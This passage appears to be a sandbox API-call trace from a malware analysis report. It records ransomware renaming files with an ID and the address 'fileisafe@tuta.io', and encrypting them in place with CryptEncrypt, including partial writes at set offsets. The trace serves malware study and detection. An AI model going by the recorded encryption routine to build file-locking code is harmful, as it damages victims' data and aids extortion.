Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar")) returned 1 [0154.165] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0154.165] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0154.165] GetFileSizeEx (in: hFile=0x2e4, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=18246297) returned 1 [0154.165] CloseHandle (hObject=0x2e4) returned 1 [0154.166] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar")) returned 0x20 [0154.166] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), lpNewFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 1 [0154.176] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e4 [0154.176] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0154.176] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0154.176] ReadFile (in: hFile=0x2e4, lpBuffer=0x3675058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x3675058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0154.323] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x5cce33, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0154.323] ReadFile (in: hFile=0x2e4, lpBuffer=0x36b5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36b5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0154.335] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x1126a99, lpNewFilePointer=0x0, dwMoveMethod=0x32af910 | out: lpNewFilePointer=0x0) returned 1 [0154.335] ReadFile (in: hFile=0x2e4, lpBuffer=0x36f5058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x32af91c, lpOverlapped=0x0 | out: lpBuffer=0x36f5058*, lpNumberOfBytesRead=0x32af91c*=0x40000, lpOverlapped=0x0) returned 1 [0154.344] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af900, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af96c | out: phKey=0x32af96c*=0xac32b0) returned 1 [0154.344] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0154.344] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0050, dwBufLen=0xc0050 | out: pbData=0x3675020*, pdwDataLen=0x32af920*=0xc0050) returned 1 [0154.345] CryptDestroyKey (hKey=0xac32b0) returned 1 [0154.345] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af948 | out: lpNewFilePointer=0x0) returned 1 [0154.345] WriteFile (in: hFile=0x2e4, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xc0102, lpNumberOfBytesWritten=0x32af958, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af958*=0xc0102, lpOverlapped=0x0) returned 1 [0154.361] SetEndOfFile (hFile=0x2e4) returned 1 [0154.361] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x1126a99, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0154.361] WriteFile (in: hFile=0x2e4, lpBuffer=0x373513a*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0 | out: lpBuffer=0x373513a*, lpNumberOfBytesWritten=0x32af924*=0x40000, lpOverlapped=0x0) returned 1 [0154.363] SetFilePointerEx (in: hFile=0x2e4, liDistanceToMove=0x5cce33, lpNewFilePointer=0x0, dwMoveMethod=0x32af918 | out: lpNewFilePointer=0x0) returned 1 [0154.363] WriteFile (hFile=0x2e4, lpBuffer=0x373513a, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x32af924, lpOverlapped=0x0) Thread: id = 118 os_tid = 0xfe0 [0140.085] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x30f0088 [0140.086] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x10000) returned 0x3100090 [0140.086] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x28) returned 0x26a9228 [0140.086] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x110102) returned 0x3791020 [0140.089] RtlAllocateHeap (HeapHandle=0x26a0000, Flags=0x0, Size=0x50) returned 0x26a9ce0 [0140.089] CryptImportKey (in: hProv=0xa968b8, pbData=0x33ef6f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x33ef760 | out: phKey=0x33ef760*=0xaa93d0) returned 1 [0140.089] CryptSetKeyParam (hKey=0xaa93d0, dwParam=0x1, pbData=0x33ef748, dwFlags=0x0) returned 1 [0140.089] CryptDecrypt (in: hKey=0xaa93d0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x26a9ce0, pdwDataLen=0x33ef714 | out: pbData=0x26a9ce0, pdwDataLen=0x33ef714) returned 1 [0140.089] CryptDestroyKey (hKey=0xaa93d0) returned 1 [0140.089] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74440000 [0140.089] GetProcAddress (hModule=0x74440000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x74456b30 [0140.089] Wow64DisableWow64FsRedirection (in: OldValue=0x33ef7b0 | out: OldValue=0x33ef7b0*=0x0) returned 1 [0140.089] HeapFree (in: hHeap=0x26a0000, dwFlags=0x0, lpMem=0x26a9ce0 | out: hHeap=0x26a0000) returned 1 [0140.089] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.626] ResetEvent (hEvent=0x29c) returned 1 [0140.626] SetEvent (hEvent=0x2a0) returned 1 [0140.626] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.626] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD" (normalized: "c:\\boot\\bcd"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.626] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.627] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.627] ResetEvent (hEvent=0x29c) returned 1 [0140.627] SetEvent (hEvent=0x2a0) returned 1 [0140.627] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.627] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\BCD.LOG1" (normalized: "c:\\boot\\bcd.log1"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2d4 [0140.628] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=0) returned 1 [0140.628] CloseHandle (hObject=0x2d4) returned 1 [0140.628] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.629] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.629] ResetEvent (hEvent=0x29c) returned 1 [0140.629] SetEvent (hEvent=0x2a0) returned 1 [0140.629] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.629] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.630] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=77664) returned 1 [0140.630] CloseHandle (hObject=0x2e0) returned 1 [0140.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui")) returned 0x20 [0140.630] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.630] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.630] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.632] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.634] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.634] ResetEvent (hEvent=0x29c) returned 1 [0140.634] SetEvent (hEvent=0x2a0) returned 1 [0140.634] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.634] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.634] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=76632) returned 1 [0140.634] CloseHandle (hObject=0x2e0) returned 1 [0140.634] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0140.634] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.634] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.635] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.636] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.636] ResetEvent (hEvent=0x29c) returned 1 [0140.636] SetEvent (hEvent=0x2a0) returned 1 [0140.636] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.636] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.636] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=75616) returned 1 [0140.636] CloseHandle (hObject=0x2e0) returned 1 [0140.637] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0140.637] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.637] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.637] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.638] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.638] ResetEvent (hEvent=0x29c) returned 1 [0140.638] SetEvent (hEvent=0x2a0) returned 1 [0140.639] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.639] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.639] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=79200) returned 1 [0140.639] CloseHandle (hObject=0x2e0) returned 1 [0140.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0140.639] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.639] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.639] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.640] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.641] ResetEvent (hEvent=0x29c) returned 1 [0140.641] SetEvent (hEvent=0x2a0) returned 1 [0140.641] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.641] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.641] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=80224) returned 1 [0140.641] CloseHandle (hObject=0x2e0) returned 1 [0140.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0140.641] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.642] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.642] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.643] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.643] ResetEvent (hEvent=0x29c) returned 1 [0140.643] SetEvent (hEvent=0x2a0) returned 1 [0140.643] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.644] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.644] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=74072) returned 1 [0140.644] CloseHandle (hObject=0x2e0) returned 1 [0140.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui")) returned 0x20 [0140.646] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.646] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-GB\\bootmgr.exe.mui" (normalized: "c:\\boot\\en-gb\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.646] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.647] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.648] ResetEvent (hEvent=0x29c) returned 1 [0140.648] SetEvent (hEvent=0x2a0) returned 1 [0140.648] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.648] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.648] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=44960) returned 1 [0140.648] CloseHandle (hObject=0x2e0) returned 1 [0140.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui")) returned 0x20 [0140.648] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\en-us\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.648] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\en-US\\memtest.exe.mui" (normalized: "c:\\boot\\en-us\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.648] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.650] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.650] ResetEvent (hEvent=0x29c) returned 1 [0140.650] SetEvent (hEvent=0x2a0) returned 1 [0140.650] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.650] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.650] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=45984) returned 1 [0140.650] CloseHandle (hObject=0x2e0) returned 1 [0140.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui")) returned 0x20 [0140.650] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\es-es\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.650] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\es-ES\\memtest.exe.mui" (normalized: "c:\\boot\\es-es\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.651] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.652] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.652] ResetEvent (hEvent=0x29c) returned 1 [0140.652] SetEvent (hEvent=0x2a0) returned 1 [0140.652] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.652] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.652] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=75104) returned 1 [0140.653] CloseHandle (hObject=0x2e0) returned 1 [0140.653] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui")) returned 0x20 [0140.653] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.653] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\et-EE\\bootmgr.exe.mui" (normalized: "c:\\boot\\et-ee\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.653] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.654] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.655] ResetEvent (hEvent=0x29c) returned 1 [0140.655] SetEvent (hEvent=0x2a0) returned 1 [0140.655] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.655] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.655] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=45472) returned 1 [0140.655] CloseHandle (hObject=0x2e0) returned 1 [0140.655] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui")) returned 0x20 [0140.655] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0140.655] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fi-FI\\memtest.exe.mui" (normalized: "c:\\boot\\fi-fi\\memtest.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0140.655] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.657] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.659] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.662] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.665] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.667] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.669] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.672] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.674] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.676] WaitForSingleObject (hHandle=0x29c, dwMilliseconds=0xffffffff) returned 0x0 [0140.677] ResetEvent (hEvent=0x29c) returned 1 [0140.677] SetEvent (hEvent=0x2a0) returned 1 [0140.677] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x33ef7b8 | out: pbBuffer=0x33ef7b8) returned 1 [0140.677] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e0 [0140.677] GetFileSizeEx (in: hFile=0x2e0, lpFileSize=0x33ef750 | out: lpFileSize=0x33ef750*=164347) returned 1 [0140.677] CloseHandle (hObject=0x2e0) returned 1 [0140.678] GetFileAttributesW (lpFileName="\\\\?\\C:\\Boot\\Fonts\\msjh_boot.ttf" (normalized: "c:\\boot\\fonts\\msjh_boot.ttf")) returned 